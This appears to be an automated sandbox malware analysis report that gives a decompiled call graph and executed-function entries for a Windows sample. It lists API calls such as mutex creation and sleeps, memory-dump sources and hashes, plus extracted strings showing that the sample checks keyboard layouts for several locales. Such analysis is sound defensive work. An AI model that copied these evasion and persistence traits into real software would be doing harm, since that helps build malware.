13618->13619 13625 52f1d __Mtx_unlock 13618->13625 13620 6c26a 5 API calls 13619->13620 13621 53024 13620->13621 13623 6c26a 5 API calls 13621->13623 13624 52fb9 13622->13624 13623->13624 13627 6c26a 5 API calls 13624->13627 13628 52fc0 __Mtx_unlock 13624->13628 13625->13621 13626 52f6f 13625->13626 13626->13614 13626->13616 13627->13628 13629 6c26a 5 API calls 13628->13629 13630 52fd8 __Cnd_broadcast 13628->13630 13629->13630 13630->13616 13631 6c26a 5 API calls 13630->13631 13632 5303c 13631->13632 13633 6c6ac GetSystemTimePreciseAsFileTime 13632->13633 13641 53080 shared_ptr __Mtx_unlock 13633->13641 13634 531c5 13635 6c26a 5 API calls 13634->13635 13636 531cb 13635->13636 13637 6c26a 5 API calls 13636->13637 13638 531d1 13637->13638 13639 6c26a 5 API calls 13638->13639 13647 53193 __Mtx_unlock 13639->13647 13640 531a7 std::future_error::future_error 13640->13602 13641->13634 13641->13636 13641->13640 13643 53132 GetCurrentThreadId 13641->13643 13642 6c26a 5 API calls 13644 531dd 13642->13644 13643->13640 13645 5313b 13643->13645 13645->13640 13646 6c6ac GetSystemTimePreciseAsFileTime 13645->13646 13648 5315f 13646->13648 13647->13640 13647->13642 13648->13634 13648->13638 13648->13647 13649 6bd4c GetSystemTimePreciseAsFileTime 13648->13649 13649->13648 13137 6d111 13139 6d121 13137->13139 13138 6d12a 13139->13138 13141 6d199 13139->13141 13142 6d1a7 SleepConditionVariableCS 13141->13142 13144 6d1c0 13141->13144 13142->13144 13144->13139 13297 59adc 13298 59aea 13297->13298 13302 59afe shared_ptr 13297->13302 13299 5a917 13298->13299 13298->13302 13300 5a953 Sleep CreateMutexA 13299->13300 13301 5a98e 13300->13301 13303 55c10 6 API calls 13302->13303 13304 59b7c 13303->13304 13305 58b30 6 API calls 13304->13305 13306 59b8d 13305->13306 13307 55c10 6 API calls 13306->13307 13308 59cb1 13307->13308 13309 58b30 6 API calls 13308->13309 13310 59cc2 13309->13310 13461 53f9f 13462 53fad 13461->13462 13464 53fb6 13461->13464 13463 52410 5 API calls 13462->13463 13463->13464 13197 5215a 13200 6c6fc 13197->13200 13199 52164 13202 6c70c 13200->13202 13203 6c724 13200->13203 13202->13203 13204 6cfbe 13202->13204 13203->13199 13205 6ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 13204->13205 13206 6cfd0 13205->13206 13206->13202 13465 59ba5 13466 59ba7 13465->13466 13467 55c10 6 API calls 13466->13467 13468 59cb1 13467->13468 13469 58b30 6 API calls 13468->13469 13470 59cc2 13469->13470 12669 86629 12672 864c7 12669->12672 12674 864d5 __cftof 12672->12674 12673 86520 12674->12673 12677 8652b 12674->12677 12676 8652a 12683 8a302 GetPEB 12677->12683 12679 86535 12680 8654a __cftof 12679->12680 12681 8653a GetPEB 12679->12681 12682 86562 ExitProcess 12680->12682 12681->12680 12684 8a31c __cftof 12683->12684 12684->12679 12880 5b1a0 12881 5b1f2 12880->12881 12882 5b3ad CoInitialize 12881->12882 12883 5b3fa shared_ptr std::future_error::future_error 12882->12883 13096 520a0 13099 6c68b 13096->13099 13098 520ac 13102 6c3d5 13099->13102 13101 6c69b 13101->13098 13103 6c3e1 13102->13103 13104 6c3eb 13102->13104 13105 6c3be 13103->13105 13106 6c39e 13103->13106 13104->13101 13115 6cd0a 13105->13115 13106->13104 13111 6ccd5 13106->13111 13109 6c3d0 13109->13101 13112 6cce3 InitializeCriticalSectionEx 13111->13112 13113 6c3b7 13111->13113 13112->13113 13113->13101 13116 6cd1f RtlInitializeConditionVariable 13115->13116 13116->13109 13145 54120 13146 5416a 13145->13146 13148 541b2 Concurrency::details::_ContextCallback::_CallInContext std::future_error::future_error 13146->13148 13149 53ee0 13146->13149 13150 53f1e 13149->13150 13151 53f48 13149->13151 13150->13148 13152 53f58 13151->13152 13155 52c00 13151->13155 13152->13148 13156 52c0e 13155->13156 13162 6b847 13156->13162 13158 52c42 13159 52c49 13158->13159 13168 52c80 13158->13168 13159->13148 13161 52c58 std::_Throw_future_error 13163 6b854 13162->13163 13167 6b873 Concurrency::details::_Reschedule_chore 13162->13167 13171 6cb77 13163->13171 13165 6b864 13165->13167 13173 6b81e 13165->13173 13167->13158 13179 6b7fb 13168->13179 13170 52cb2 shared_ptr 13170->13161 13172 6cb92 CreateThreadpoolWork 13171->13172 13172->13165 13174 6b827 Concurrency::details::_Reschedule_chore 13173->13174 13177 6cdcc 13174->13177 13176 6b841 13176->13167 13178 6cde1 TpPostWork 13177->13178 13178->13176 13180 6b807 13179->13180 13181 6b817 13179->13181 13180->13181 13183 6ca78 13180->13183 13181->13170 13184 6ca8d TpReleaseWork 13183->13184 13184->13181 13316 5af20 13317 5af63 13316->13317 13328 86660 13317->13328 13322 8663f 4 API calls 13323 5af80 13322->13323 13324 8663f 4 API calls 13323->13324 13325 5af98 __cftof 13324->13325 13334 555f0 13325->13334 13327 5b04e shared_ptr std::future_error::future_error 13329 8a671 __cftof 4 API calls 13328->13329 13330 5af69 13329->13330 13331 8663f 13330->13331 13332 8a671 __cftof 4 API calls 13331->13332 13333 5af71 13332->13333 13333->13322 13335 55610 13334->13335 13337 55710 std::future_error::future_error 13335->13337 13338 522c0 13335->13338 13337->13327 13341 52280 13338->13341 13342 52296 13341->13342 13345 887f8 13342->13345 13348 87609 13345->13348 13347 522a4 13347->13335 13349 87649 13348->13349 13353 87631 __cftof std::future_error::future_error 13348->13353 13350 8690a __cftof 4 API calls 13349->13350 13349->13353 13351 87661 13350->13351 13354 87bc4 13351->13354 13353->13347 13356 87bd5 13354->13356 13355 87be4 __cftof 13355->13353 13356->13355 13361 88168 13356->13361 13366 87dc2 13356->13366 13371 87de8 13356->13371 13381 87f36 13356->13381 13362 88178 13361->13362 13363 88171 13361->13363 13362->13356 13390 87b50 13363->13390 13365 88177 13365->13356 13367 87dcb 13366->13367 13368 87dd2 13366->13368 13369 87b50 4 API calls 13367->13369 13368->13356 13370 87dd1 13369->13370 13370->13356 13373 87e09 __cftof 13371->13373 13374 87def 13371->13374 13372 87f69 13379 87f77 13372->13379 13380 87f8b 13372->13380 13398 88241 13372->13398 13373->13356 13374->13372 13374->13373 13376 87fa2 13374->13376 13374->13379 13376->13380 13394 88390 13376->13394 13379->13380 13402 886ea 13379->13402 13380->13356 13382 87f69 13381->13382 13383 87f4f 13381->13383 13384 88241 4 API calls 13382->13384 13388 87f77 13382->13388 13389 87f8b 13382->13389 13383->13382 13385 87fa2 13383->13385 13383->13388 13384->13388 13386 88390 4 API calls 13385->13386 13385->13389 13386->13388 13387 886ea 4 API calls 13387->13389 13388->13387 13388->13389 13389->13356 13392 87b62 13390->13392 13391 88ab6 4 API calls 13393 87b85 13391->13393 13392->13391 13393->13365 13395 883ab 13394->13395 13396 883dd 13395->13396 13406 8c88e 13395->13406 13396->13379 13399 8825a 13398->13399 13413 8d3c8 13399->13413 13401 8830d 13401->13379 13401->13401 13403 8875d std::future_error::future_error 13402->13403 13405 88707 13402->13405 13403->13380 13404 8c88e __cftof 4 API calls 13404->13405 13405->13403 13405->13404 13409 8c733 13406->13409 13408 8c8a6 13408->13396 13410 8c743 13409->13410 13411 8c748 __cftof 13410->13411 13412 8690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13410->13412 13411->13408 13412->13411 13414 8d3d8 __cftof 13413->13414 13417 8d3ee 13413->13417 13414->13401 13415 8d485 13419 8d4ae 13415->13419 13420 8d4e4 13415->13420 13416 8d48a 13426 8cbdf 13416->13426 13417->13414 13417->13415 13417->13416 13421 8d4cc 13419->13421 13422 8d4b3 13419->13422 13443 8cef8 13420->13443 13439 8d0e2 13421->13439 13432 8d23e 13422->13432 13427 8cbf1 13426->13427 13428 8690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13427->13428 13429 8cc05 13428->13429 13430 8cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 13429->13430 13431 8cc0d __alldvrm __cftof _strrchr 13429->13431 13430->13431 13431->13414 13435 8d26c 13432->13435 13433 8d2a5 13433->13414 13434 8d2de 13436 8cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13434->13436 13435->13433 13435->13434 13437 8d2b7 13435->13437 13436->13433 13438 8d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13437->13438 13438->13433 13440 8d10f 13439->13440 13441 8d14e 13440->13441 13442 8d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13440->13442 13441->13414 13442->13441 13444 8cf10 13443->13444 13445 8cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13444->13445 13446 8cf75 13444->13446 13445->13446 13446->13414 13650 53fe0 13651 54022 13650->13651 13652 540d2 13651->13652 13653 5408c 13651->13653 13656 54035 std::future_error::future_error 13651->13656 13654 53ee0 3 API calls 13652->13654 13657 535e0 13653->13657 13654->13656 13658 53616 13657->13658 13659 52ce0 5 API calls 13658->13659 13661 5364e Concurrency::cancel_current_task shared_ptr std::future_error::future_error 13658->13661 13660 5369e 13659->13660 13660->13661 13662 52c00 3 API calls 13660->13662 13661->13656 13662->13661 13219 5a9f4 13230 59230 13219->13230 13221 5aa03 shared_ptr 13222 55c10 6 API calls 13221->13222 13228 5aab3 shared_ptr 13221->13228 13223 5aa65 13222->13223 13224 55c10 6 API calls 13223->13224 13225 5aa8d 13224->13225 13226 55c10 6 API calls 13225->13226 13226->13228 13229 5ad3c shared_ptr std::future_error::future_error 13228->13229 13240 88ab6 13228->13240 13233 59284 shared_ptr 13230->13233 13231 55c10 6 API calls 13231->13233 13232 59543 shared_ptr std::future_error::future_error 13232->13221 13233->13231 13234 5944f shared_ptr 13233->13234 13234->13232 13235 55c10 6 API calls 13234->13235 13237 5979f shared_ptr 13234->13237 13235->13234 13236 598b5 shared_ptr std::future_error::future_error 13236->13221 13237->13236 13238 55c10 6 API calls 13237->13238 13239 59927 shared_ptr std::future_error::future_error 13238->13239 13239->13221 13241 88ad1 13240->13241 13242 88868 4 API calls 13241->13242 13243 88adb 13242->13243 13243->13228 13256 54276 13257 52410 5 API calls 13256->13257 13258 5427f 13257->13258 13188 58d30 13189 58d80 13188->13189 13190 55c10 6 API calls 13189->13190 13191 58d9a shared_ptr std::future_error::future_error 13190->13191 13207 52170 13208 6c6fc InitializeCriticalSectionEx 13207->13208 13209 5217a 13208->13209 13264 542b0 13267 53ac0 13264->13267 13266 542bb shared_ptr 13269 53af9 13267->13269 13268 53b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 13268->13266 13269->13268 13270 53c38 13269->13270 13271 532d0 6 API calls 13269->13271 13272 532d0 6 API calls 13270->13272 13274 53c5f 13270->13274 13271->13270 13272->13274 13273 53c68 13273->13266 13274->13273 13275 53810 4 API calls 13274->13275 13276 53cdb 13275->13276 13471 577b0 13472 577f1 shared_ptr 13471->13472 13473 55c10 6 API calls 13472->13473 13475 57883 shared_ptr 13472->13475 13473->13475 13474 55c10 6 API calls 13477 579e3 13474->13477 13475->13474 13476 57953 shared_ptr std::future_error::future_error 13475->13476 13478 55c10 6 API calls 13477->13478 13479 57a15 shared_ptr 13478->13479 13480 55c10 6 API calls 13479->13480 13485 57aa5 shared_ptr std::future_error::future_error 13479->13485 13481 57b7d 13480->13481 13482 55c10 6 API calls 13481->13482 13483 57ba0 13482->13483 13484 55c10 6 API calls 13483->13484 13484->13485 13486 587b0 13487 587b6 13486->13487 13488 587b8 GetFileAttributesA 13486->13488 13487->13488 13489 587c4 13488->13489 13490 647b0 13492 64eed 13490->13492 13491 64f59 shared_ptr std::future_error::future_error 13492->13491 13493 57d30 7 API calls 13492->13493 13494 650ed 13493->13494 13529 58380 13494->13529 13496 65106 13497 55c10 6 API calls 13496->13497 13498 65155 13497->13498 13499 55c10 6 API calls 13498->13499 13500 65171 13499->13500 13535 59a00 13500->13535 13530 583e5 __cftof 13529->13530 13531 55c10 6 API calls 13530->13531 13532 58403 shared_ptr std::future_error::future_error 13530->13532 13533 58427 13531->13533 13532->13496 13534 55c10 6 API calls 13533->13534 13534->13532 13536 59a3f 13535->13536 13537 55c10 6 API calls 13536->13537 13538 59a47 13537->13538 13539 58b30 6 API calls 13538->13539 13540 59a58 13539->13540 12939 587b2 12940 587b6 12939->12940 12941 587b8 GetFileAttributesA 12939->12941 12940->12941 12942 587c4 12941->12942 13281 59ab8 13283 59acc 13281->13283 13284 59b08 13283->13284 13285 55c10 6 API calls 13284->13285 13286 59b7c 13285->13286 13293 58b30 13286->13293 13288 59b8d 13289 55c10 6 API calls 13288->13289 13290 59cb1 13289->13290 13291 58b30 6 API calls 13290->13291 13292 59cc2 13291->13292 13294 58b7c 13293->13294 13295 55c10 6 API calls 13294->13295 13296 58b97 shared_ptr std::future_error::future_error 13295->13296 13296->13288

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 0008652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(?,?,0008652A,?,?,?,?,?,00087661), ref: 00086567
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                                                                                            • Opcode ID: 47947e04eb841be71188c2be2f9374d3f628f775f791c5a1bd6fe5ae37287d6b
                                                                                                                                                                                                                                                                            • Instruction ID: 731aaa87a6691a299760dde3fe76fdaa1defe1da8ddad1f6a38302bf1a67a738
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47947e04eb841be71188c2be2f9374d3f628f775f791c5a1bd6fe5ae37287d6b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECE0C230006908AFCF25FB58C90DD993B69FF1274AF420800FD494A62BCB36EE81CB80
                                                                                                                                                                                                                                                                            Function 04A70C76 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2154853703.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ae6f57536813832d03d838eada40f759e7dfcf7eef4538de57cac8f8e8c2027e
                                                                                                                                                                                                                                                                            • Instruction ID: af98cd1124ecceac8ef4a583cf0e4ec24177c9d4e1b1736f0775ee3130b1e756
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae6f57536813832d03d838eada40f759e7dfcf7eef4538de57cac8f8e8c2027e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 841126FB34D221BD316295862F249FB6A3EE5C6730331C42AF847D6403F2956A4A6032
                                                                                                                                                                                                                                                                            Function 00055C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                                                            • API String ID: 0-3963862150
                                                                                                                                                                                                                                                                            • Opcode ID: 3557cf2058be4ac27503c0736d9ae20d27f1b28374670f0b9d688da0cf144eca
                                                                                                                                                                                                                                                                            • Instruction ID: d944f0503e235e278879064e4647ac34714ee1f9431ab088d435b21b8610626f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3557cf2058be4ac27503c0736d9ae20d27f1b28374670f0b9d688da0cf144eca
